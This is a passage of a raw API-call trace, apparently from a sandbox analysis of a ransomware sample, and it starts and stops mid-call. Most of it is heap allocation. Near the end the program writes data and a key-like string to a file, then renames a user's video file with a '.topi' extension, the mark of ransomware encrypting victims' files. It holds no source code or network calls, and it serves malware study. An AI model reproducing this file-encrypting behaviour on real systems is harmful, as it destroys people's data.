0x99d9e08 [0097.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.402] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.402] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e50 | out: hHeap=0x680000) returned 1 [0097.402] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.402] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e38 | out: hHeap=0x680000) returned 1 [0097.402] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.402] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.402] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.402] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.402] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.402] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.402] GetCurrentThreadId () returned 0x8c4 [0097.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f99b0 [0097.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.402] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.402] GetCurrentThreadId () returned 0x8c4 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e38 [0097.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0097.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e50 [0097.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e20 [0097.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4e68 [0097.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0097.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e38 | out: hHeap=0x680000) returned 1 [0097.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e38 [0097.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e38 | out: hHeap=0x680000) returned 1 [0097.404] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.405] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e68 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e50 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e20 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e08 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb530 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.406] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xa4b1, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xa4b1, lpOverlapped=0x0) returned 1 [0097.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.406] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xa4b6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.406] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.406] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.406] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.406] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.406] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.406] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.406] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.406] CloseHandle (hObject=0x6a8) returned 1 [0097.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0097.408] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0097.408] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0097.408] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\HBcE7 BrxksR8J\\xK14nQb8WZ0.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\hbce7 brxksr8j\\xk14nqb8wz0.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\HBcE7 BrxksR8J\\xK14nQb8WZ0.swf.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\hbce7 brxksr8j\\xk14nqb8wz0.swf.topi")) returned 1 [0097.408] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.408] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.409] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0097.410] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bb97b0, ftCreationTime.dwHighDateTime=0x1d5c448, ftLastAccessTime.dwLowDateTime=0x19644140, ftLastAccessTime.dwHighDateTime=0x1d5bbf5, ftLastWriteTime.dwLowDateTime=0x19644140, ftLastWriteTime.dwHighDateTime=0x1d5bbf5, nFileSizeHigh=0x0, nFileSizeLow=0xa4b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xK14nQb8WZ0.swf", cAlternateFileName="XK14NQ~1.SWF")) returned 0 [0097.410] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0097.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0097.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.410] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e40f0 | out: hHeap=0x680000) returned 1 [0097.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4168 | out: hHeap=0x680000) returned 1 [0097.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0097.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4090 | out: hHeap=0x680000) returned 1 [0097.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4128 | out: hHeap=0x680000) returned 1 [0097.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e41e0 | out: hHeap=0x680000) returned 1 [0097.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4258 | out: hHeap=0x680000) returned 1 [0097.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0097.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b41c0 | out: hHeap=0x680000) returned 1 [0097.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317eb10 | out: hHeap=0x680000) returned 1 [0097.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df338 | out: hHeap=0x680000) returned 1 [0097.410] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6edd00 | out: hHeap=0x680000) returned 1 [0097.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df338 [0097.410] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.410] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.411] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.411] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.412] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0097.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0097.412] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.412] HeapFree (in: 